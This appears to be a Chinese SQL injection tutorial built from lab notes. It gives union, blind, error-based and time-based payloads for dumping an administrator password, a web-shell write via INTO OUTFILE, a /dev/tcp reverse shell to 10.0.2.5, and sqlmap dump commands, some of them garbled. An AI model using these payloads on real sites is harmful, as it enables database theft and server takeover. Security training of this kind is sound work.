SQL注入一文全解----包括Sqlmap的利用，利用mysql写reverseshell

Sql注入 更多姿势

1. PostSwigger

SQL injection cheat sheet | Web Security Academy

案例

• 联合注入的手动测试

  1. 判断字段数

     1. 'ORDER+BY+2-- 字段数为2，
     2. 3时报错，故而2

  2. 判断子段能否接受字符串

     1. 'UNION+SELECT+‘123’,‘dfsfa’–
     2. 页面返回成功 ，可以接受

  3. 判断数据库类型

     1. 'UNION+SELECT+@@version,‘dfsfa’–
     2. MySQL和微软
     3. 'UNION+SELECT+version(),‘dfsfa’–
     4. PostgreSQL
     5. 'UNION+SELECT+NULL,version FROM v$instance –
     6. Oracle

     经验证为PostSql

  4. 查询表名

     1. '+UNION+SELECT+tablename,NULL+FROM+informationschema.tables–
     2. 查到users_yxcapd 可能包含username or passwd informations

  5. 查询列名字

     1. ‘+UNION+SELECT+columnname,NULL+FROM+informationschema.columns+where+tablename='usersyxcapd’–
     2. 得到 passworduuqjjs and usernamefrlczf two columns name

  6. 查询内容

     1. '+UNION+SELECT+passworduuqjjs,usernamefrlczf+FROM+users_yxcapd–

• 基于响应的盲注手动测试

  注意引号的闭合

  1. 注入点判断

     1. TrackingId=xyz’ AND ‘1’='1
     2. TrackingId=xyz’ AND ‘1’='2

  2. 判断是否存在users表

     1. TrackingId=xyz’ AND (SELECT ‘a’ FROM users LIMIT 1)='a
     2. SELECT ‘a’ FROM users 这一部分表示 返回’a’ 常量 ，若users存在，则返回a 。 若不存在则页面出错。（测试时使用的网页表现为若正常则返回welcome ，否则没有welcome）
     3. limit 1 表示 无论有多少数据 只返回第一行 ，不对列进行操作
     4. 即：只有users表存在的时候 ，逻辑关系是 ‘a’='a’成立，才会返回welcom。

  3. 判断是否存在administrator用户

     1. TrackingId=xyz’ AND (SELECT ‘a’ FROM users WHERE username=‘administrator’)='a
     2. SELECT ‘a’ FROM users 这一部分恒真
     3. WHERE username=‘administrator’ 若存在则真 逻辑关系’a’='a’才成立返回welcome。

  4. 判断administrator的密码长度

     1. TrackingId=xyz’ AND (SELECT ‘a’ FROM users WHERE username=‘administrator’ AND LENGTH(password)>1)='a
     2. SELECT ‘a’ FROM users 恒真
     3. WHERE username=‘administrator’ 恒真
     4. LENGTH(password)>1) 模糊测试 若密码长度大于1则为真，逻辑关系’a’='a’成立。返回welcome

  5. 继续判断

     1. TrackingId=xyz’ AND (SELECT ‘a’ FROM users WHERE username=‘administrator’ AND LENGTH(password)>3)='a 不断修改password>i (i∈1 2 3 4 ……)

  6. 确定密码长度后确定密码每个位置的字符

     1. TrackingId=xyz’ AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username=‘administrator’)='a
     2. SELECT SUBSTRING(password,1,1) substring为子串函数，表示password的第1个字符匹配1位 。
     3. 通过不断修改substring(password,2,1) 的数值，来逐个判断出每个字符串的具体字符。

  7. burpsuite添加字符逐个爆破

     1. TrackingId=xyz’ AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username=‘administrator’)='§a§
     2. 思路------通过修改substring(password,i,1) i处的数值，来判断是否等于最后结尾处的§a§
     3. §a§ 的范围设置在a-z，0-9之间
     4. 即: substring(password,i,1) 当i等于1时,表示 密码中的第一位字符 去匹配a-z,1-9 看看是否界面返回了welcome–这一功能我们可以在inthder模块中的grep 匹配中设置我们需要匹配的字符来实现。

     适用情况:SQL查询的结果不返回，也不显示错误信息。但如果查询返回任何行，应用程序会在页面中包含一条“欢迎回来”消息。

• 基于错误的盲注手动测试

  1. 判断是否存在注入点
     1. TrackingId=xyz**'**
     2. 加 ’ 查看是否报错
  2. 再次判断
     1. TrackingId=xyz**‘’**
     2. 加双 单引号 查看错误是否消失
     3. 若消失则可以说明 ’ 产生了作用,表明语法错误（在本例中为未闭合的引号）对响应产生了可检测到的影响
  3. 尝试
     1. TrackingId=xyz’||(SELECT ’ ')||’ 其中 ||为字符串拼接 相当于在后面拼接了一个空白,不产生任何作用
     2. 上述发生报错,说明,数据库不支持该格式,修改
     3. TrackingId=xyz’||(SELECT ‘’ FROM dual)||’ dual表是Oracle特有的表 .响应无报错 说明该数据库为Oracle
     4. 这要求所有SELECT语句显式指定表名-----Oracle特有
  4. 在判断完数据库后,验证是否确实存在注入
     1. TrackingId=xyz’||(SELECT ‘’ FROM not-a-real-table)||’ 其中 not-a-real-table是一个不存在的表
     2. 上述出现报错. 此行为强烈表明后端正在将注入作为 SQL 查询进行处理。
  5. 判断表名
     1. TrackingId=xyz’||(SELECT ‘’ FROM users WHERE ROWNUM = 1)||’ 查看users表是否存在
     2. 若没有返回错误,这说明该表确实存在
     3. 其中 rownum函数 相当于 MySQL中的 limit 1 都表示返回一行. 但是在Oracle中没有limit函数。故而采用其他函数进行平替
     4. 添加rownum函数的目的在于防止查询返回多于一行，这会破坏我们的串联。
  6. 测试 case end 该测试条件是否可以响应
     1. TrackingId=xyz’||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE ‘’ END FROM dual)||’ —若响应则应报错
     2. TrackingId=xyz’||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE ‘’ END FROM dual)||’ —修改判断条件，报错消失。表明可以根据特定条件的真实性有条件地触发错误
  7. 判断administrator用户是否存在
     1. TrackingId=xyz’||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE ‘’ END FROM users WHERE username=‘administrator’)||’ —若存在则报错
  8. 判断密码长度
     1. TrackingId=xyz’||(SELECT CASE WHEN LENGTH(password)>1 THEN to_char(1/0) ELSE ‘’ END FROM users WHERE username=‘administrator’)||’
  9. burpsuite 判断字符
     1. TrackingId=xyz’||(SELECT CASE WHEN SUBSTR(password,1,1)=‘a’ THEN TO_CHAR(1/0) ELSE ‘’ END FROM users WHERE username=‘administrator’)||’
     2. TrackingId=xyz’||(SELECT CASE WHEN SUBSTR(password,1,1)=‘§a§’ THEN TO_CHAR(1/0) ELSE ‘’ END FROM users WHERE username=‘administrator’)||’
     3. TrackingId=xyz’||(SELECT CASE WHEN SUBSTR(password,2,1)='§a§’ THEN TO_CHAR(1/0) ELSE ‘’ END FROM users WHERE username=‘administrator’)||’ —修改数值判断…….
     4. TrackingId=xyz’||(SELECT CASE WHEN SUBSTR(password,§2§,1)='§a§’ THEN TO_CHAR(1/0) ELSE ‘’ END FROM users WHERE username=‘administrator’)||’ ****把两处都添加为变量进行破解
     5. 第一处为1-20 从密码长度得出。
     6. 第二处改为a-z 0-9 A-Z

• 基于可见错误的盲注手动测试

  1. 判断是否存在注入点
     1. TrackingId=ogAZZfxtOKUELbuJ’ 是否出现错误
     2. TrackingId=ogAZZfxtOKUELbuJ’’ 错误是否消失
     3. 判断TrackingId=ogAZZfxtOKUELbuJ’-- 错误是否消失 这里说明注释起到了作用 —这里出现了报错信息的回显，表明可以利用报错注入
  2. 构造报错语句
     1. ’ AND CAST((SELECT 1) AS int)-- 这里的cast()函数可以修改数据的数据类型
     2. 即: 把 1 转化为整数类型 运行后发现报错([ERROR: argument of AND must be type boolean, not type integer](ERROR: argument of AND must be type boolean, not type integer)) 根据报错可知 and 后面必须是一个布尔型的数据类型
  3. 根据报错进行构造
     1. ’ AND **1=**CAST((SELECT 1) AS int)-- 报错消失,说明构造的语句发挥了作用
     2. ’ AND 1=CAST((SELECT username FROM users) AS int)-- 再次进行构造,尝试获取username —出现报错
     3. 报错信息(Unterminated string literal started at position 95 in SQL SELECT * FROM tracking WHERE id = ‘fOPoniV9hYwm4fZ3’ AND 1=CAST((SELECT username FROM users) AS’. Expected char)
     4. 这说明字符数过于多,尝试删除cookie来空出字符
     5. TrackingId=’ AND 1=CAST((SELECT username FROM users) AS int)-- 报错信息变更,说明更改产生了作用
     6. 报错信息([ERROR: more than one row returned by a subquery used as an expression](ERROR: more than one row returned by a subquery used as an expression)) 这表明返回不仅一行
     7. TrackingId=’ AND 1=CAST((SELECT username FROM users limit 1) AS int)-- —再次进行构造,限制返回行数
     8. 出现错误信息([ERROR: invalid input syntax for type integer: “administrator”](ERROR: invalid input syntax for type integer: “administrator”)) —这返回了第一个用户administrator
     9. 即:泄漏了表中的第一个用户名
  4. 获取密码
     1. ’ AND 1=CAST((SELECT password FROM users limit 1) AS int)-- —构造语句获取密码
     2. 报错信息([ERROR: invalid input syntax for type integer: “q9c7x6xcdn34bcazv2jd”](ERROR: invalid input syntax for type integer: “q9c7x6xcdn34bcazv2jd”))

• 带有时间延迟和信息检索的盲注手动测试

  1. 判断是否存在时间盲注
     1. trackingId=x’ ; SELECT+CASE+WHEN+(1=1)+THEN+pgsleep(10)+ELSE+pgsleep(0)+END–
     2. 若存在时间盲注则该响应会等待十秒才会响应
     3. TrackingId=x’%3BSELECT+CASE+WHEN+(1=2)+THEN+pgsleep(10)+ELSE+pgsleep(0)+END-- 验证是否是因为语句延迟（排除网络因素）
  2. 判断用户名
     1. TrackingId=x’%3BSELECT+CASE+WHEN+(username=‘administrator’)+THEN+pgsleep(10)+ELSE+pgsleep(0)+END+FROM+users–
     2. 延迟存在 ， 说明存在administrator用户
  3. 判断密码长度
     1. TrackingId=x’%3BSELECT+CASE+WHEN+(username=‘administrator’+AND+LENGTH(password)>1)+THEN+pgsleep(10)+ELSE+pgsleep(0)+END+FROM+users–
     2. 多次测试 最终确定密码长度为20
  4. 密码爆破
     1. TrackingId=x’%3BSELECT+CASE+WHEN+(username=‘administrator’+AND+SUBSTRING(password,1,1)=‘a’)+THEN+pgsleep(10)+ELSE+pgsleep(0)+END+FROM+users–
     2. 在bp中添加payload 进行爆破，在列中选择发送到响应 。 时间较长的便是延迟存在的

---

2. 读内容

1. 利用 informationschema.tables 来获取 tablename
2. 利用 informationschema.columns 来获取 columnname
3. 利用获取的 tablename 和 columnname 来输出内容 尝试获取 登录界面或者ssh的登录密码和用户名

3. 利用sql注入一句话木马

" union select "php-reverse-shell-code one-line" into outfile "/var/www/html/uploads/shell.php"; -- -

这个可以通过获取 传入命令的方式来查看相关文件和信息

---

也可以生成一个反弹shell

" union select "& /dev/tcp/10.0.2.5/1234 0>&1'\"); ?>","","" into outfile "/var/www/html/uploads/shreverse.php"; -- -

通过nc 进行监听和反弹

4. 通过sqlmap

sql -u "http://10.0.2.7/kzMb5nVYJw/420search.php?usrtosearch=asd" --dbms mysql --dbs

显示出当前都有哪些库

---

sql -u "http://10.0.2.7/kzMb5nVYJw/420search.php?usrtosearch=asd" --dbms mysql -D 库名 --tables

显示出当前的表名

---

sql -u "http://10.0.2.7/kzMb5nVYJw/420search.php?usrtosearch=asd" --dbms mysql -D 库名 -T 表名 --columns

显示出当前的列名

---

sql -u "http://10.0.2.7/kzMb5nVYJw/420search.php?usrtosearch=asd" --dbms mysql -D 库名 -T 表名 --dump

1 union select 1,group_concat(column_name) from information_schema.columns where talbe_name= 0x7573657273 #&Submit=Submit

1 union select 1,group_concat(column_name) from information_schema.columns where table_name = 0x7573657273 #